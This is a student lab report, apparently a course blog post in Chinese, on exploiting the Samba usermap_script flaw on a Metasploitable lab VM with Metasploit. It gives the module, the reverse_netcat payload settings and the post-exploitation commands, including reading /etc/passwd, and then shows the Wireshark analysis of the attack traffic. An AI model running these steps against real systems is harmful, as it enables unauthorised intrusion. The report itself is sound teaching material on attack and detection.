20252913 2025-2026-2 《网络攻防实践》实践七报告

20252913 2025-2026-2 《网络攻防实践》实践七报告

1.实践内容

1.1 利用Metasploit对Linux进行远程渗透测试

通过Metasploit渗透测试平台,针对Linux靶机中Samba服务的Usermap_script安全漏洞开展渗透攻击,最终取得目标主机的控制权限。具体操作流程如下:

  1. 启动Metasploit工具,使用msfconsole进入。
  2. 加载对应的渗透攻击模块,此处选用专门利用Samba服务Usermap_script漏洞的模块:exploit/multi/samba/usermap_script。
  3. 配置攻击载荷(PAYLOAD),选择远程Shell类型,可根据网络环境决定使用正向连接或反向连接。
  4. 设置相关攻击参数,包括目标主机IP(RHOST)、本机IP(LHOST)等。
  5. 执行渗透攻击,启动过程并观察返回状态。
  6. 结果确认,检查是否成功获取远程Shell,并验证所获得的主机访问权限级别,以评估攻击成效。

1.2 攻防对抗实践作业

本次实践采用攻防对抗形式,分为攻击方和防守方,具体任务如下:

  • 攻击方使用Metasploit对Metasploitable靶机进行漏洞扫描与识别,选择其中可利用的漏洞实施渗透,在获取远程控制权后,进一步提权直至取得root权限。
  • 防守方使用wireshark工具监听网络流量,捕获攻击过程中所有数据包并保存。随后利用wireshark数据包进行分析,提取攻击关键信息,包括: 攻击源IP与目标IP及端口 攻击发生时间 所利用的漏洞信息 攻击中使用的Shellcode 攻击成功后攻击者在靶机上执行的所有命令记录。

2.实践过程

攻击机kali IP:192.168.200.6

靶机metasploitable IP:192.168.200.130

2.1 使用Metasploit进行Linux远程渗透攻击

1.kali攻击机切换root权限后,通过指令msfconsole启动metasploit渗透模块:

image-20260422163201834

2.查找usermap_script安全漏洞:

search usermap_script

image-20260422163304009

3.启用渗透模块 exploit/multi/samba/usermap_script

use exploit/multi/samba/usermap_script

image-20260422163425846

4.通过show payloads指令查看该模块支持的攻击载荷列表:

image-20260422163507721

5.设置连接载荷、攻击机、靶机IP:

set payload cmd/unix/reverse_netcat
set RHOSTS 192.168.200.130
set LHOST 192.168.200.6

image-20260422163603459

6.通过show options查看设置:

image-20260422163636136

7.执行攻击exploit,但是攻击失败:

image-20260422163712228

8.将连接载荷设置为正向连接后再次进行攻击:

image-20260422163737704

9.攻击成功并在shell中执行指令验证结果:

whoami #查看用户
id #
ls -l #查看文件目录
pwd #查看当前目录
ls #查看文件目录
cat /etc/passwd #查看有哪些用户

image-20260422164444801

image-20260422164452435

2.2 攻防对抗实践

1.在攻击前启动wireshark进行抓包。

2.攻击后执行指令:

whoami
id
ls -l
pwd
ls
cat /etc/passwd 
shell #查看shell权限账户

image-20260422164757090

3.通过指令筛选攻击机与靶机之间的流量:

ip.addr == 192.168.200.6 && ip.addr == 192.168.200.130

image-20260422164934092

源IP:192.168.200.6

目的IP:192.168.200.130

目标端口:445,即Samba服务默认端口

4.找到SMB协议的数据包对其继续追踪,可以看出攻击机让靶机反向连接攻击机的4444端口以建立控制:

image-20260422165020281

5.对TCP数据包进行追踪,可以看到攻击成功后在命令行输入的信息:

image-20260422165042983

3.学习中遇到的问题及解决

- 问题1:攻击链路的走向设置为反向连接时攻击失败
- 问题1解决方案:将设置修改为正向连接后攻击成功。

4.实践总结

通过本次实践,我掌握了Metasploit的基本渗透流程与模块化操作思维,理解了从漏洞利用到获取Shell的完整链条。在攻防对抗中,我更直观地认识到攻击的隐蔽性及防御中流量分析的价值,深化了对网络攻防本质是信息博弈的理解。

posted @ 2026-04-22 17:04  G116h6  阅读(15)  评论(0)    收藏  举报